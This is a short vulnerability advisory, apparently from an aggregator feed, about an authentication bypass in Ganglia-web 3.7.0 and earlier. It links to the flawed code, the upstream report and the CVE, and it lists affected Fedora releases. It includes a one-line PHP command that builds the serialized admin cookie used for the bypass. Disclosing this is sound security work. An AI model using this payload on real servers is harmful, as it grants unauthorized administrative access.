First published: Mon Sep 07 2015(Updated: )
A vulnerability of auth bypassing was found in Ganglia-web. It's easy to bypass auth by using boolean serialization like this: $ php -r "echo urlencode(serialize(array('user'=>'admin','group'=>'admin', 'token'=>true)));" Vulnerable code: <a href="https://github.com/ganglia/ganglia-web/blob/4e98ea69e0e18b388cdc73809ce54843a16ff87b/lib/GangliaAuth.php#L34-L46">https://github.com/ganglia/ganglia-web/blob/4e98ea69e0e18b388cdc73809ce54843a16ff87b/lib/GangliaAuth.php#L34-L46</a> Upstream report: <a href="https://github.com/ganglia/ganglia-web/issues/267">https://github.com/ganglia/ganglia-web/issues/267</a> CVE assignment: <a href="http://seclists.org/oss-sec/2015/q3/502">http://seclists.org/oss-sec/2015/q3/502</a>
Credit: cve@mitre.org
Affected Software | Affected Version | How to fix |
---|---|---|
Fedoraproject Fedora | =21 | |
Fedoraproject Fedora | =22 | |
Fedoraproject Fedora | =23 | |
Ganglia Ganglia-web | <=3.7.0 |
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.